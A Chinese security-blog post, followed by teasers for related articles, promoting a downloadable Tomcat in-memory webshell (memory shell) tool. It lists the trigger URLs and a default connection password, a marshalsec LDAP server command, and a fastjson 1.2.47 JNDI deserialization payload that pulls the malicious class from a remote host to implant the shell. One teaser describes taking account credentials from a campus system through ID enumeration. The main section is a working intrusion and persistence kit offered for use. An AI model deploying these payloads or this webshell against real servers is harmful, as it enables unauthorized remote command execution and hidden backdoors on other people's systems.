神兵利器 | 分享直接上手就用的内存马（附下载）

VSole2023-05-18 09:06:22

一、工具简介

拿来即用的Tomcat7/8/9/10版本Listener/Filter/Servlet内存马，支持注入CMD内存马和冰蝎内存马。

二、使用方法

1、Listener型/Filter型:

CMD内存马URL：xx.xx.xx.xx/?chan=whoami
冰蝎内存马URL：xx.xx.xx.xx/     默认连接密码：goautomne

2、Servlet型：

CMD内存马URL: xx.xx.xx.xx/p?chan=whoami
冰蝎内存马URL: xx.xx.xx.xx/p     默认连接密码：goautomne

三、利用举例

以fastjson1.2.47版本的反序列化漏洞为例，将对应Tomcat版本的class文件，这里以ILRain.class为例，上传到web服务器，并开启LDAP服务

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://xx.xx.xx.xx/#ILRain 9102

然后再打入fastjson漏洞的poc,就可以使用冰蝎客户端去连接了

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://xx.xx.xx.xx:9102/123",
        "autoCommit":true
    }
}

四、下载地址

项目地址：https://github.com/ce-automne/TomcatMemShell

xx

本作品采用《CC 协议》，转载必须注明作者和本文链接

xxe漏洞的学习与利用总结

2021-11-04 06:37:22

xml基础知识要了解xxe漏洞，那么一定得先明白基础知识，了解xml文档的基础组成。XML用于标记电子文件使其具有结构性的标记语言，可以用来标记数据、定义数据类型，是一种允许用户对自己的标记语言进行定义的源语言。1，元素元素是 XML 以及 HTML 文档的主要构建模块，元素可包含文本、其他元素或者是空的。

XX客户端APP签名分析之bp插件打造篇

2021-08-02 19:09:58

本篇主要思路及方法来自于bit4woo和CC11001100两位巨佬的成果。学习链接https://github.com/bit4woo/burp-api-drops

XX客户端APP签名分析之脱壳篇

2021-08-02 19:07:58

对于当前的APP来说，基本都采用了加壳这一方式来对APP进行加固，这也是在算法分析上需要过的第一个点。在挖洞过程中，主要还是针对业务层逻辑进行分析处理，寻找漏洞点。因此本篇利用某园这一APP，侧重点在于对脱壳原理的介绍和一些脱壳工具的分享和使用。

XX客户端APP签名分析之算法分析篇

2021-08-02 19:06:58

将脱壳后的dex文件在jadx打开，由于脱壳后会产生多个dex，因此先用脚本合并一下比较方便。当然最新版jadx支持增加文件，也可以直接添加。

[安全风险通告] XXL-JOB 未授权远程命令执行漏洞安全风险通告

2020-10-28 16:12:27

鉴于漏洞危害较大，建议客户尽快采用处置建议或使用奇安信产品解决方案。默认情况下XXL-JOB的API接口没有开启相关认证，未授权的攻击者可构造恶意请求，造成远程执行命令，直接控制服务器。漏洞利用无需登录，实际风险极高，奇安信CERT建议XXL-JOB 用户尽快采取相关措施缓解漏洞攻击。奇安信开源卫士已更新奇安信开源卫士通过更新到20201027. 467版本，支持对XXL-JOB未授权远程命令执行漏洞的检测。

对于XXE漏洞的理解以及在实战中的利用

2023-03-29 10:31:01

--第一行是XML声明-->. --这是XML处理指令的例子。后的第一个单词是处理指令名，在本例中是xml-->. --处理指令一定要顶格写，前面不能有任何空白-->. XML文档必须有且只有一个根元素。version特性表明这个文档符合XML 1.0规范。0x02：实体实体叫ENTITY，实体的作用是避免重复输入。0x03:处理指令PI处理指令用于XML解析器传递信息到应用程序。这些文本将被解析器检查实体以及标记。

禁用XXE处理漫谈

2023-03-13 10:52:32

近期准备面试题时，XXE漏洞防范措施（或者说修复方式）在一些文章中比较简略

一步一步教你漏洞挖掘之XXL-JOB 未授权 Hessian2反序列化漏洞分析与复现

2021-11-01 05:27:36

引言XXL-JOB是一个分布式任务调度平台，其核心设计目标是开发迅速、学习简单、轻量级、易扩展。现已开放源代码并接入多家公司线上产品线，开箱即用。XXL-JOB v2.2.0及以下版本API接口存在Hessian2反序列化漏洞，可通过相关利用链结合JNDI注入实现RCE。

分布式定时调度：xxl-job 万字详解

2022-11-29 09:18:22

任务模块专注于任务的执行等操作，开发和维护更加简单和高效；接收“调度中心”的执行请求、终止请求和日志请求等。XXL-JOB的不同任务之间并行调度、并行执行。同时支持任务终止。当任务”路由策略”选择”故障转移”时，当调度中心每次发起调度请求时，会按照顺序对执行器发出心跳检测请求，第一个检测为存活状态的执行器将会被选定并发送调度请求。

记一次校内的XX系统渗透

2022-10-08 07:20:28

正文首先进入主页是这个样子F12也没找到啥接口。注入也无。。。。搜到一个人力资源管理系统F12有惊喜，这里背景图片居然是download+id。然后顺势遍历一波ID。拿到账号密码，回去科研管理系统登陆一波所有功能都点一遍，熟悉下环境看这URL。。这套系统还是Asp的。。后端应该就是IIS+Asp+SqlServer熟悉了下语句，后端应该是select xxxx from xxxx where 1=1 +and+left>=12++and++ and ProjLevel=*03*. 直接用base64解码写入了，省去了很多烦恼当我访问时，却是500？？

VSole

网络安全专家